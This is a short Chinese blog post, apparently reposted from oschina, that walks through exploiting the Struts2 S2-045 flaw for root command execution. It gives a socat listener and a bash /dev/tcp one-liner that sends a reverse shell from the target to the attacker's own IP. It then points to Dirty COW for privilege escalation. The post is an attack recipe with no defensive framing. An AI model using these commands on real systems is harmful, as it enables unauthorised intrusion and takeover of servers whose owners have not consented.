博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
st2045 漏洞反弹root shell
阅读量:6840 次
发布时间:2019-06-26

本文共 237 字,大约阅读时间需要 1 分钟。

hot3.png

通过strust2 045漏洞,拿到root命令执行权限。 在自己服务器上,安装socat,监听端口如

socat TCP-LISTEN:8337 readline

在目标服务器上执行 

bash -i>& /dev/tcp/自己的ip/8337 0>&1

可在自己服务器上看到反弹的root shell,可以执行命令,查看端口情况。

查看linux版本,找内核漏洞

脏牛提权,

 

转载于:https://my.oschina.net/phybrain/blog/1556452

你可能感兴趣的文章
Android Accessibility学习笔记
查看>>
QEMU用户模式学习笔记
查看>>
两种方法解决mysql主从不同步
查看>>
Lvs+Keepalived+MySQL Cluster架设高可用负载均衡Mysql集群
查看>>
Spring高级应用之注入嵌套Bean
查看>>
mini6410 uboot1.1.6 MMC fat command support
查看>>
系统日志的实践应用
查看>>
基于SmartGwt的分页组件
查看>>
【oraInventory】由OUI-10035和OUI-10033错误引发的关于oraInventory目录位置的思考
查看>>
网站访问用时统计
查看>>
小技巧--sendmail脚本
查看>>
何时需要权衡可见性
查看>>
Cocos2d-x 3.x游戏开发之旅
查看>>
JavaWeb技术之--面向对象设计模式
查看>>
EKL PHP 调取_search接口查询 添加购物车统计
查看>>
linux 查看IO情况
查看>>
序列化 serialize 问题
查看>>
【shell】Linux shell 之 case 详解
查看>>
人生是什么?
查看>>
Ant 给工程打包
查看>>